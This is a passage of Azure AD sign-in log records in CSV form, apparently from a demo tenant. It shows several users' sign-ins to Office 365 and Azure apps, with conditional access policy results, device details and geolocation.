'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",99476ccd-67d1-454b-a7cf-079e8a841100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,99476ccd-67d1-454b-a7cf-079e8a841100,SigninLogs,Sucess,33.7984581,-84.38828278
+1960,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:30.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7bc7469f-f0d2-0000-5d33-f5b475e025a4,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ca1de4aa-1783-40c1-890d-66bc05ea1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,ca1de4aa-1783-40c1-890d-66bc05ea1000,SigninLogs,Sucess,33.7984581,-84.38828278
+1961,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:44.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bd41abe2-ff8b-4707-bfcb-0bbde1f38a56,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ca1de4aa-1783-40c1-890d-66bc58ec1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,ca1de4aa-1783-40c1-890d-66bc58ec1000,SigninLogs,Sucess,33.7984581,-84.38828278
+1962,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:00.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,27e97115-7f10-4bf0-83ab-0d01abaf8e76,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e9cfabe1-d666-446f-aeb7-58172cde1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e9cfabe1-d666-446f-aeb7-58172cde1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1963,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:40.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5374abba-89aa-4501-9fe6-5fbdfae62cee,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9e4a541200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,03932e54-fdb0-4c07-8405-8b9e4a541200,SigninLogs,Sucess,33.7984581,-84.38828278
+1964,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:03.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b6451e84-cd0d-419e-98f7-c5ef741ddc02,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Dynamics 365 Portal,bab47555-038a-4434-a931-96cc6091cdd7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:14,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",178eb907-c36d-4662-9369-da02aaf61100,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,178eb907-c36d-4662-9369-da02aaf61100,SigninLogs,Sucess,50.6406517,5.572050095
+1965,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:13.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,024fdd65-4acf-46c4-8e97-aaced536e2c0,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:10,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Edge 18.1836', 'displayName': 'LCFLAGLER12', 'trustType': 'Azure AD registered', 'isCompliant': True, 'isManaged': True}",8533d46a-2775-44a1-99a8-4a97cb421700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8533d46a-2775-44a1-99a8-4a97cb421700,SigninLogs,Sucess,29.4803009,-81.21395111
+1966,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:15.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ad42fed0-9dca-48c6-b95e-5db3925ca1b0,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",fd7a6355-56f5-4bc2-9ad4-c25971700f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,fd7a6355-56f5-4bc2-9ad4-c25971700f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1967,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:40.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e9b90d2a-5862-48c6-8147-c83d5c426c23,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': 